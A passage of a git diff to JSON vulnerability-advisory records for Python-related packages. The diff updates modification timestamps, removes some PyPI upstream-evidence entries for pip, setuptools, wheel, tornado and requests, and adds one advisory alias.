@@ "schema_version": "1.7.3", "id": "BREW-python@3.9-CVE-2013-1888", "published": "2026-08-13T17:29:58Z", - "modified": "2026-08-13T17:29:58Z", + "modified": "2026-09-10T20:33:57Z", "upstream": [ "GHSA-4gv5-qhvr-36vv", "CVE-2013-1888", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pip", - "subject_version": "25.3", - "key": "pkg:pypi/pip@25.3", - "resource": "pip" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-python@3.9-CVE-2013-5123.json b/advisories/BREW-python@3.9-CVE-2013-5123.json index 97a60494fbd..cdb1c82b671 100644 --- a/advisories/BREW-python@3.9-CVE-2013-5123.json +++ b/advisories/BREW-python@3.9-CVE-2013-5123.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-python@3.9-CVE-2013-5123", "published": "2026-08-13T17:29:58Z", - "modified": "2026-08-13T17:29:58Z", + "modified": "2026-09-10T20:33:57Z", "upstream": [ "GHSA-c5h8-cq4v-cvfm", "CVE-2013-5123", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pip", - "subject_version": "25.3", - "key": "pkg:pypi/pip@25.3", - "resource": "pip" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-python@3.9-CVE-2014-8991.json b/advisories/BREW-python@3.9-CVE-2014-8991.json index 8797e6e84dd..3b214f6836d 100644 --- a/advisories/BREW-python@3.9-CVE-2014-8991.json +++ b/advisories/BREW-python@3.9-CVE-2014-8991.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-python@3.9-CVE-2014-8991", "published": "2026-08-13T17:29:58Z", - "modified": "2026-08-13T17:29:58Z", + "modified": "2026-09-10T20:33:57Z", "upstream": [ "GHSA-53mr-44pp-crf4", "CVE-2014-8991", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pip", - "subject_version": "25.3", - "key": "pkg:pypi/pip@25.3", - "resource": "pip" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-python@3.9-CVE-2019-20916.json b/advisories/BREW-python@3.9-CVE-2019-20916.json index 3696629a27e..5a9b261b23c 100644 --- a/advisories/BREW-python@3.9-CVE-2019-20916.json +++ b/advisories/BREW-python@3.9-CVE-2019-20916.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-python@3.9-CVE-2019-20916", "published": "2026-08-13T17:29:58Z", - "modified": "2026-08-13T17:29:58Z", + "modified": "2026-09-10T20:33:57Z", "upstream": [ "GHSA-gpvv-69j7-gwj8", "CVE-2019-20916", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pip", - "subject_version": "25.3", - "key": "pkg:pypi/pip@25.3", - "resource": "pip" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-python@3.9-CVE-2021-3572.json b/advisories/BREW-python@3.9-CVE-2021-3572.json index db90653b46a..a4fa7820e28 100644 --- a/advisories/BREW-python@3.9-CVE-2021-3572.json +++ b/advisories/BREW-python@3.9-CVE-2021-3572.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-python@3.9-CVE-2021-3572", "published": "2026-08-13T17:29:58Z", - "modified": "2026-08-13T17:29:58Z", + "modified": "2026-09-10T20:33:57Z", "upstream": [ "GHSA-5xp3-jfq3-5q8x", "CVE-2021-3572", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pip", - "subject_version": "25.3", - "key": "pkg:pypi/pip@25.3", - "resource": "pip" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-python@3.9-CVE-2022-40897.json b/advisories/BREW-python@3.9-CVE-2022-40897.json index dce3937ebce..4e6876b9902 100644 --- a/advisories/BREW-python@3.9-CVE-2022-40897.json +++ b/advisories/BREW-python@3.9-CVE-2022-40897.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-python@3.9-CVE-2022-40897", "published": "2026-08-13T17:29:58Z", - "modified": "2026-08-13T17:29:58Z", + "modified": "2026-09-10T20:33:57Z", "upstream": [ "GHSA-r9hx-vwmv-q579", "BIT-setuptools-2022-40897", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "80.9.0", - "key": "pkg:pypi/setuptools@80.9.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-python@3.9-CVE-2022-40898.json b/advisories/BREW-python@3.9-CVE-2022-40898.json index 45dafb1fdb8..f39388313ae 100644 --- a/advisories/BREW-python@3.9-CVE-2022-40898.json +++ b/advisories/BREW-python@3.9-CVE-2022-40898.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-python@3.9-CVE-2022-40898", "published": "2026-08-13T17:29:58Z", - "modified": "2026-08-13T17:29:58Z", + "modified": "2026-09-10T20:33:57Z", "upstream": [ "GHSA-qwmp-2cf2-g9g6", "CVE-2022-40898", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "wheel", - "subject_version": "0.45.1", - "key": "pkg:pypi/wheel@0.45.1", - "resource": "wheel" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-python@3.9-CVE-2023-5752.json b/advisories/BREW-python@3.9-CVE-2023-5752.json index c6d09fed2aa..e347e8a0f20 100644 --- a/advisories/BREW-python@3.9-CVE-2023-5752.json +++ b/advisories/BREW-python@3.9-CVE-2023-5752.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-python@3.9-CVE-2023-5752", "published": "2026-08-13T17:29:58Z", - "modified": "2026-08-13T17:29:58Z", + "modified": "2026-09-10T20:33:57Z", "upstream": [ "GHSA-mq26-g339-26xf", "CVE-2023-5752", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pip", - "subject_version": "25.3", - "key": "pkg:pypi/pip@25.3", - "resource": "pip" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-python@3.9-CVE-2024-6345.json b/advisories/BREW-python@3.9-CVE-2024-6345.json index 71e4ca0d553..262faf58fb1 100644 --- a/advisories/BREW-python@3.9-CVE-2024-6345.json +++ b/advisories/BREW-python@3.9-CVE-2024-6345.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-python@3.9-CVE-2024-6345", "published": "2026-08-13T17:29:58Z", - "modified": "2026-08-13T17:29:58Z", + "modified": "2026-09-10T20:33:57Z", "upstream": [ "GHSA-cx63-2mw6-8hw5", "BIT-setuptools-2024-6345", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "80.9.0", - "key": "pkg:pypi/setuptools@80.9.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-python@3.9-CVE-2025-47273.json b/advisories/BREW-python@3.9-CVE-2025-47273.json index 27104d4b749..f591ecd32a0 100644 --- a/advisories/BREW-python@3.9-CVE-2025-47273.json +++ b/advisories/BREW-python@3.9-CVE-2025-47273.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-python@3.9-CVE-2025-47273", "published": "2026-08-13T17:29:58Z", - "modified": "2026-08-13T17:29:58Z", + "modified": "2026-09-10T20:33:57Z", "upstream": [ "GHSA-5rjg-fvgr-3xxf", "BIT-setuptools-2025-47273", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "80.9.0", - "key": "pkg:pypi/setuptools@80.9.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-python@3.9-CVE-2025-8869.json b/advisories/BREW-python@3.9-CVE-2025-8869.json index 88e462b4e99..273641fb536 100644 --- a/advisories/BREW-python@3.9-CVE-2025-8869.json +++ b/advisories/BREW-python@3.9-CVE-2025-8869.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-python@3.9-CVE-2025-8869", "published": "2026-08-13T17:29:58Z", - "modified": "2026-08-13T17:29:58Z", + "modified": "2026-09-10T20:33:57Z", "upstream": [ "GHSA-4xh5-x5gv-qwph", "CVE-2025-8869", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pip", - "subject_version": "25.3", - "key": "pkg:pypi/pip@25.3", - "resource": "pip" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-python@3.9-CVE-2026-13346.json b/advisories/BREW-python@3.9-CVE-2026-13346.json index cf52a9132ec..556c9605dbb 100644 --- a/advisories/BREW-python@3.9-CVE-2026-13346.json +++ b/advisories/BREW-python@3.9-CVE-2026-13346.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-python@3.9-CVE-2026-13346", "published": "2026-08-23T21:32:49Z", - "modified": "2026-09-02T09:45:09Z", + "modified": "2026-09-10T20:33:57Z", "upstream": [ "PYSEC-2026-3721", "CVE-2026-13346", @@ -39,14 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pip", - "subject_version": "25.3", - "key": "pkg:pypi/pip@25.3", - "resource": "pip" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-python@3.9-CVE-2026-1703.json b/advisories/BREW-python@3.9-CVE-2026-1703.json index 38c36626f9e..ed867aed8af 100644 --- a/advisories/BREW-python@3.9-CVE-2026-1703.json +++ b/advisories/BREW-python@3.9-CVE-2026-1703.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-python@3.9-CVE-2026-1703", "published": "2026-08-13T17:29:58Z", - "modified": "2026-08-13T17:29:58Z", + "modified": "2026-09-10T20:33:57Z", "upstream": [ "GHSA-6vgw-5pg2-w6jp", "CVE-2026-1703", @@ -39,14 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pip", - "subject_version": "25.3", - "key": "pkg:pypi/pip@25.3", - "resource": "pip" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-python@3.9-CVE-2026-24049.json b/advisories/BREW-python@3.9-CVE-2026-24049.json index e83a288b358..7a94d032067 100644 --- a/advisories/BREW-python@3.9-CVE-2026-24049.json +++ b/advisories/BREW-python@3.9-CVE-2026-24049.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-python@3.9-CVE-2026-24049", "published": "2026-08-13T17:29:58Z", - "modified": "2026-08-13T17:29:58Z", + "modified": "2026-09-10T20:33:57Z", "upstream": [ "GHSA-8rrh-rw8j-w5fx", "CVE-2026-24049", @@ -39,14 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "wheel", - "subject_version": "0.45.1", - "key": "pkg:pypi/wheel@0.45.1", - "resource": "wheel" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-python@3.9-CVE-2026-3219.json b/advisories/BREW-python@3.9-CVE-2026-3219.json index d4e02e0c5ab..64cb5537066 100644 --- a/advisories/BREW-python@3.9-CVE-2026-3219.json +++ b/advisories/BREW-python@3.9-CVE-2026-3219.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-python@3.9-CVE-2026-3219", "published": "2026-08-13T17:29:58Z", - "modified": "2026-08-13T17:29:58Z", + "modified": "2026-09-10T20:33:57Z", "upstream": [ "GHSA-58qw-9mgm-455v", "CVE-2026-3219", @@ -39,14 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pip", - "subject_version": "25.3", - "key": "pkg:pypi/pip@25.3", - "resource": "pip" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-python@3.9-CVE-2026-59890.json b/advisories/BREW-python@3.9-CVE-2026-59890.json index 9f272a5955b..8c2554eaa4b 100644 --- a/advisories/BREW-python@3.9-CVE-2026-59890.json +++ b/advisories/BREW-python@3.9-CVE-2026-59890.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-python@3.9-CVE-2026-59890", "published": "2026-08-13T17:29:58Z", - "modified": "2026-08-13T17:29:58Z", + "modified": "2026-09-10T20:33:57Z", "upstream": [ "GHSA-h35f-9h28-mq5c", "BIT-setuptools-2026-59890", @@ -40,14 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "80.9.0", - "key": "pkg:pypi/setuptools@80.9.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-python@3.9-CVE-2026-6357.json b/advisories/BREW-python@3.9-CVE-2026-6357.json index 1a6a5a3ec5f..137a4cce974 100644 --- a/advisories/BREW-python@3.9-CVE-2026-6357.json +++ b/advisories/BREW-python@3.9-CVE-2026-6357.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-python@3.9-CVE-2026-6357", "published": "2026-08-13T17:29:58Z", - "modified": "2026-08-13T17:29:58Z", + "modified": "2026-09-10T20:33:57Z", "upstream": [ "GHSA-jp4c-xjxw-mgf9", "CVE-2026-6357", @@ -39,14 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pip", - "subject_version": "25.3", - "key": "pkg:pypi/pip@25.3", - "resource": "pip" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-python@3.9-CVE-2026-8643.json b/advisories/BREW-python@3.9-CVE-2026-8643.json index 4566c3cefea..abfa0fb487d 100644 --- a/advisories/BREW-python@3.9-CVE-2026-8643.json +++ b/advisories/BREW-python@3.9-CVE-2026-8643.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-python@3.9-CVE-2026-8643", "published": "2026-08-13T17:29:58Z", - "modified": "2026-08-13T17:29:58Z", + "modified": "2026-09-10T20:33:57Z", "upstream": [ "GHSA-wf93-45jw-7689", "CVE-2026-8643", @@ -39,14 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pip", - "subject_version": "25.3", - "key": "pkg:pypi/pip@25.3", - "resource": "pip" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snakeviz-CVE-2012-2374.json b/advisories/BREW-snakeviz-CVE-2012-2374.json index b1f6a9850ed..ed1d80b94e4 100644 --- a/advisories/BREW-snakeviz-CVE-2012-2374.json +++ b/advisories/BREW-snakeviz-CVE-2012-2374.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snakeviz-CVE-2012-2374", "published": "2026-08-13T17:34:42Z", - "modified": "2026-09-03T10:11:36Z", + "modified": "2026-09-10T20:54:15Z", "upstream": [ "GHSA-f7fv-v9rh-prvc", "CVE-2012-2374", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "tornado", - "subject_version": "6.5.8", - "key": "pkg:pypi/tornado@6.5.8", - "resource": "tornado" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snakeviz-CVE-2014-9720.json b/advisories/BREW-snakeviz-CVE-2014-9720.json index 09e81ddc6fa..cc7d899db89 100644 --- a/advisories/BREW-snakeviz-CVE-2014-9720.json +++ b/advisories/BREW-snakeviz-CVE-2014-9720.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snakeviz-CVE-2014-9720", "published": "2026-08-13T17:34:42Z", - "modified": "2026-09-03T10:11:36Z", + "modified": "2026-09-10T20:54:15Z", "upstream": [ "GHSA-8vpw-mgpf-mpvv", "CVE-2014-9720", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "tornado", - "subject_version": "6.5.8", - "key": "pkg:pypi/tornado@6.5.8", - "resource": "tornado" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snakeviz-CVE-2023-28370.json b/advisories/BREW-snakeviz-CVE-2023-28370.json index b7ab814f51b..e5f4df2aa88 100644 --- a/advisories/BREW-snakeviz-CVE-2023-28370.json +++ b/advisories/BREW-snakeviz-CVE-2023-28370.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snakeviz-CVE-2023-28370", "published": "2026-08-13T17:34:42Z", - "modified": "2026-09-03T10:11:36Z", + "modified": "2026-09-10T20:54:15Z", "upstream": [ "GHSA-hj3f-6gcp-jg8j", "CVE-2023-28370", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "tornado", - "subject_version": "6.5.8", - "key": "pkg:pypi/tornado@6.5.8", - "resource": "tornado" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snakeviz-CVE-2024-52804.json b/advisories/BREW-snakeviz-CVE-2024-52804.json index 95a01d08c91..24fb056f0a9 100644 --- a/advisories/BREW-snakeviz-CVE-2024-52804.json +++ b/advisories/BREW-snakeviz-CVE-2024-52804.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snakeviz-CVE-2024-52804", "published": "2026-08-13T17:34:42Z", - "modified": "2026-09-03T10:11:36Z", + "modified": "2026-09-10T20:54:15Z", "upstream": [ "GHSA-8w49-h785-mj3c", "CVE-2024-52804", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "tornado", - "subject_version": "6.5.8", - "key": "pkg:pypi/tornado@6.5.8", - "resource": "tornado" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snakeviz-CVE-2025-47287.json b/advisories/BREW-snakeviz-CVE-2025-47287.json index 3ebc386afff..aae73558a73 100644 --- a/advisories/BREW-snakeviz-CVE-2025-47287.json +++ b/advisories/BREW-snakeviz-CVE-2025-47287.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snakeviz-CVE-2025-47287", "published": "2026-08-13T17:34:42Z", - "modified": "2026-09-03T10:09:39Z", + "modified": "2026-09-10T20:54:15Z", "upstream": [ "GHSA-7cx3-6m66-7c5m", "CVE-2025-47287", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "tornado", - "subject_version": "6.5.8", - "key": "pkg:pypi/tornado@6.5.8", - "resource": "tornado" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snakeviz-CVE-2025-67724.json b/advisories/BREW-snakeviz-CVE-2025-67724.json index 918cd978d61..eabb66cd554 100644 --- a/advisories/BREW-snakeviz-CVE-2025-67724.json +++ b/advisories/BREW-snakeviz-CVE-2025-67724.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snakeviz-CVE-2025-67724", "published": "2026-08-13T17:34:42Z", - "modified": "2026-09-03T10:11:36Z", + "modified": "2026-09-10T20:54:15Z", "upstream": [ "GHSA-pr2v-jx2c-wg9f", "CVE-2025-67724", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "tornado", - "subject_version": "6.5.8", - "key": "pkg:pypi/tornado@6.5.8", - "resource": "tornado" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snakeviz-CVE-2025-67725.json b/advisories/BREW-snakeviz-CVE-2025-67725.json index 3850ac22d56..b503ae34576 100644 --- a/advisories/BREW-snakeviz-CVE-2025-67725.json +++ b/advisories/BREW-snakeviz-CVE-2025-67725.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snakeviz-CVE-2025-67725", "published": "2026-08-13T17:34:42Z", - "modified": "2026-09-03T10:11:36Z", + "modified": "2026-09-10T20:54:15Z", "upstream": [ "GHSA-c98p-7wgm-6p64", "CVE-2025-67725", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "tornado", - "subject_version": "6.5.8", - "key": "pkg:pypi/tornado@6.5.8", - "resource": "tornado" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snakeviz-CVE-2025-67726.json b/advisories/BREW-snakeviz-CVE-2025-67726.json index 4ae878a294f..04fb750bb73 100644 --- a/advisories/BREW-snakeviz-CVE-2025-67726.json +++ b/advisories/BREW-snakeviz-CVE-2025-67726.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snakeviz-CVE-2025-67726", "published": "2026-08-13T17:34:42Z", - "modified": "2026-09-03T10:11:36Z", + "modified": "2026-09-10T20:54:15Z", "upstream": [ "GHSA-jhmp-mqwm-3gq8", "CVE-2025-67726", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "tornado", - "subject_version": "6.5.8", - "key": "pkg:pypi/tornado@6.5.8", - "resource": "tornado" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snakeviz-CVE-2026-31958.json b/advisories/BREW-snakeviz-CVE-2026-31958.json index 81478699c2f..658459d7d3b 100644 --- a/advisories/BREW-snakeviz-CVE-2026-31958.json +++ b/advisories/BREW-snakeviz-CVE-2026-31958.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snakeviz-CVE-2026-31958", "published": "2026-08-13T17:34:42Z", - "modified": "2026-09-03T10:11:36Z", + "modified": "2026-09-10T20:54:15Z", "upstream": [ "GHSA-qjxf-f2mg-c6mc", "CVE-2026-31958", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "tornado", - "subject_version": "6.5.8", - "key": "pkg:pypi/tornado@6.5.8", - "resource": "tornado" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snakeviz-CVE-2026-35536.json b/advisories/BREW-snakeviz-CVE-2026-35536.json index 03a2ce9a076..0468dce6aa8 100644 --- a/advisories/BREW-snakeviz-CVE-2026-35536.json +++ b/advisories/BREW-snakeviz-CVE-2026-35536.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snakeviz-CVE-2026-35536", "published": "2026-08-13T17:34:42Z", - "modified": "2026-09-03T10:09:39Z", + "modified": "2026-09-10T20:54:15Z", "upstream": [ "GHSA-78cv-mqj4-43f7", "CVE-2026-35536", @@ -43,22 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "tornado", - "subject_version": "6.5.8", - "key": "pkg:pypi/tornado@6.5.8", - "resource": "tornado" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "tornado", - "subject_version": "6.5.8", - "key": "pkg:pypi/tornado@6.5.8", - "resource": "tornado" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snakeviz-CVE-2026-49853.json b/advisories/BREW-snakeviz-CVE-2026-49853.json index f22636f4388..e484d400e07 100644 --- a/advisories/BREW-snakeviz-CVE-2026-49853.json +++ b/advisories/BREW-snakeviz-CVE-2026-49853.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snakeviz-CVE-2026-49853", "published": "2026-08-13T17:34:42Z", - "modified": "2026-09-03T10:09:39Z", + "modified": "2026-09-10T20:54:15Z", "upstream": [ "GHSA-3x9g-8vmp-wqvf", "CVE-2026-49853", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "tornado", - "subject_version": "6.5.8", - "key": "pkg:pypi/tornado@6.5.8", - "resource": "tornado" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snakeviz-CVE-2026-49854.json b/advisories/BREW-snakeviz-CVE-2026-49854.json index e5f9f26e4a1..dca612f1ae6 100644 --- a/advisories/BREW-snakeviz-CVE-2026-49854.json +++ b/advisories/BREW-snakeviz-CVE-2026-49854.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snakeviz-CVE-2026-49854", "published": "2026-08-13T17:34:42Z", - "modified": "2026-09-03T10:11:36Z", + "modified": "2026-09-10T20:54:15Z", "upstream": [ "GHSA-cx3h-4qpv-8hc9", "CVE-2026-49854", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "tornado", - "subject_version": "6.5.8", - "key": "pkg:pypi/tornado@6.5.8", - "resource": "tornado" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snakeviz-CVE-2026-49855.json b/advisories/BREW-snakeviz-CVE-2026-49855.json index 62c8a833894..00ab2e56700 100644 --- a/advisories/BREW-snakeviz-CVE-2026-49855.json +++ b/advisories/BREW-snakeviz-CVE-2026-49855.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snakeviz-CVE-2026-49855", "published": "2026-08-13T17:34:42Z", - "modified": "2026-09-03T10:11:36Z", + "modified": "2026-09-10T20:54:15Z", "upstream": [ "GHSA-mgf9-4vpg-hj56", "CVE-2026-49855", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "tornado", - "subject_version": "6.5.8", - "key": "pkg:pypi/tornado@6.5.8", - "resource": "tornado" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snakeviz-CVE-2026-82397.json b/advisories/BREW-snakeviz-CVE-2026-82397.json index b5b96f423c9..3103099898c 100644 --- a/advisories/BREW-snakeviz-CVE-2026-82397.json +++ b/advisories/BREW-snakeviz-CVE-2026-82397.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-snakeviz-CVE-2026-82397", "published": "2026-09-03T10:11:36Z", - "modified": "2026-09-03T10:11:36Z", + "modified": "2026-09-10T20:54:15Z", "upstream": [ "GHSA-mpf4-983q-p7j4", - "CVE-2026-82397" + "CVE-2026-82397", + "PYSEC-2026-3928" ], "affected": [ { diff --git a/advisories/BREW-vs-preview-CVE-2014-1829.json b/advisories/BREW-vs-preview-CVE-2014-1829.json index f4269791967..f8d0fc5201c 100644 --- a/advisories/BREW-vs-preview-CVE-2014-1829.json +++ b/advisories/BREW-vs-preview-CVE-2014-1829.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2014-1829", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-cfj3-7x9c-4p3h", "CVE-2014-1829", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.32.5", - "key": "pkg:pypi/requests@2.32.5", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2014-1830.json b/advisories/BREW-vs-preview-CVE-2014-1830.json index 9999262e8f5..e6bea63f6fc 100644 --- a/advisories/BREW-vs-preview-CVE-2014-1830.json +++ b/advisories/BREW-vs-preview-CVE-2014-1830.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2014-1830", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-652x-xj99-gmcc", "CVE-2014-1830", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.32.5", - "key": "pkg:pypi/requests@2.32.5", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2015-2296.json b/advisories/BREW-vs-preview-CVE-2015-2296.json index 954222bd506..c734b66e6b1 100644 --- a/advisories/BREW-vs-preview-CVE-2015-2296.json +++ b/advisories/BREW-vs-preview-CVE-2015-2296.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2015-2296", "published": "2026-08-13T17:48:55Z", - 